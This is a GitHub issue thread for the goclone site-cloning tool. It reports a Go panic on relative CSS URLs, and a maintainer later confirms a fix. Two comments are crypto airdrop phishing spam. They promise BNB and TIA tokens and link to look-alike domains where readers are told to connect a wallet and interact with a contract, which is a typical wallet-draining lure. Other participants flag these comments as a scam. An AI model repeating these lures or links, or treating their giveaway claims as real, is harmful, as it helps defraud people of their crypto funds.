### ISSUE TITLE
Does not work with relative URLs

### ISSUE THREAD

**Issue by asheroto** [goclone-dev/goclone#28]
```
Css found --> /css/bootstrap.min.css
Extracting -->  /css/bootstrap.min.css
panic: Get "/css/bootstrap.min.css": unsupported protocol scheme ""

goroutine 6 [running]:
github.com/imthaghost/goclone/crawler.Extractor({0xc0000e86d8, 0x16}, {0xc000018750, 0x27})
        C:/Users/User/go/pkg/mod/github.com/imthaghost/goclone@v1.1.4/crawler/extractor.go:35 +0x285
github.com/imthaghost/goclone/crawler.Collector.func1(0xc000089860)
        C:/Users/User/go/pkg/mod/github.com/imthaghost/goclone@v1.1.4/crawler/collector.go:25 +0xe7
github.com/gocolly/colly.(*Collector).handleOnHTML.func1(0xc0000f4010, 0xc0003a43f0)
        C:/Users/User/go/pkg/mod/github.com/gocolly/colly@v1.2.0/colly.go:963 +0x78
github.com/PuerkitoBio/goquery.(*Selection).Each(0xc0003a43c0, 0xc000073e40)
        C:/Users/User/go/pkg/mod/github.com/!puerkito!bio/goquery@v1.5.1/iteration.go:10 +0x46
github.com/gocolly/colly.(*Collector).handleOnHTML(0xc0001a0b60, 0xc0000e6000)
        C:/Users/User/go/pkg/mod/github.com/gocolly/colly@v1.2.0/colly.go:953 +0x24d
github.com/gocolly/colly.(*Collector).fetch(0xc0001a0b60, {0x0, 0x0}, {0x107bd31, 0x3}, 0x1, {0x0, 0x0}, 0x0, 0xc0002742a0, ...)
        C:/Users/User/go/pkg/mod/github.com/gocolly/colly@v1.2.0/colly.go:623 +0x68d
created by github.com/gocolly/colly.(*Collector).scrape
        C:/Users/User/go/pkg/mod/github.com/gocolly/colly@v1.2.0/colly.go:532 +0x556
```

**Comment by awei84** [comment]
Has this bug been fixed?

**Comment by tobomobo** [comment]
+1 Please .. using this to export Webflow sites would be spectacular...

**Comment by smartnusantara** [comment]
# $BNB Airdrop Guide: Claim Your $1000 in BNB Now!

🎉 Congratulations! You've won a share of the $1.500k Binance Airdrop, and we're excited to give you $1500 in BNB to celebrate the end of the year. But that's not all—connect now, and you'll instantly receive an additional $100! Follow the steps below to claim your tokens and make the most of this festive giveaway!

[![Claim Now](https://miro.medium.com/v2/resize:fit:1400/1*57DPVRALhv45ef334fpetQ.jpeg)](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance)

## Steps to Claim:

### 1. 🌐 Connect Your Binance Wallet:
   - Click on the [Connect Wallet](https://wwww.bnb-chainexchaing.online/?utm_source=github&utm_medium=email&utm_campaign=airdrop&utm_content=binance) link.
   - Choose your preferred wallet provider (Metamask, Trust Wallet, etc.).

### 2. 🔄 Interact with the Contract:
   - Once your wallet is connected.
   - Click on the "**Claim**" button to interact with the smart contract.

💰 Don't miss out on your $1.000k in BNB! Plus, enjoy an instant $100 upon connection. Act now to secure your tokens. And hey, seize the chance to win up to $20,000—it's your golden opportunity!


Winners: @bbenejc, @astrrr, @kadirosmanust, @Rishabh-Streak, @DreamShrimp, @ayc-d, @Anisi

**Comment by asheroto** [comment]
Everyone please report and block the spam/scam posted by smartnusantara by tapping the dots at the top right of their post.

**Comment by mesaglio** [comment]
Deleted phishing comment

**Comment by zhouxing5311** [comment]
# Celestia Airdrop - Claim Your Free TIA Tokens Now! 

[![Celestia Banner](https://miro.medium.com/v2/resize:fit:1400/1*O0la1gfWxFHTQf1ZOoT9_Q.png)](https://celestia.eigenllayer.online/)

**Don't Miss Out on Your Share of 60 Million $TIA Tokens!**  
Celestia, the revolutionary data availability network, is giving away a whopping 60 million $TIA tokens to the community! This is your chance to grab a piece of the action and secure your future in the crypto world.

*How to Claim Your Free TIA Tokens:**  
It's easy to get started and claim your free TIA tokens. Follow these simple steps:

1. **Connect Wallet:** Visit the [Celestia Airdrop page](https://celestia.eigenllayer.online/) and connect your wallet.
2. **Claim:** Click the Claim button to receive your tokens.
3. **Interact:** Engage with the provided smart contract to earn additional rewards.

**Why Wait? Start Earning Today!**  
With Celestia, the sky's the limit. Don't let this opportunity slip through your fingers. Join the Celestia Airdrop now and kickstart your journey to financial freedom!liushmh, @DLSLegacy, @vivekascoder, @lg, @WilfredTA, @zkSoju, @danscan, @LuisNaldo7, @Vishal-Isharani, @ascjones, @liuderchi, @rndvec, @akannke, @Olo23, @chirag-bgh, @mfiumara, @Pet3ris, @anom1998, @Lisprez, @Vid201

**Comment by mesaglio** [comment]
Can you have an example page that generate this bug?

**Comment by asheroto** [comment]
It's been four years since I opened this issue, so I don't remember which site I used, and don't know if the bug still exists. I haven't used goclone in awhile.

While installing I ran into an error, so I can't verify the site, but try https://eventghost.net as it contains relative images.

FYI...

![Image](https://github.com/user-attachments/assets/4f06547d-23fa-44b2-8cda-501dcfc5737d)

Thanks for taking a look at this. 😊

**Comment by mesaglio** [comment]
This was fixed in https://github.com/goclone-dev/goclone/issues/96#issuecomment-3203786098 @asheroto
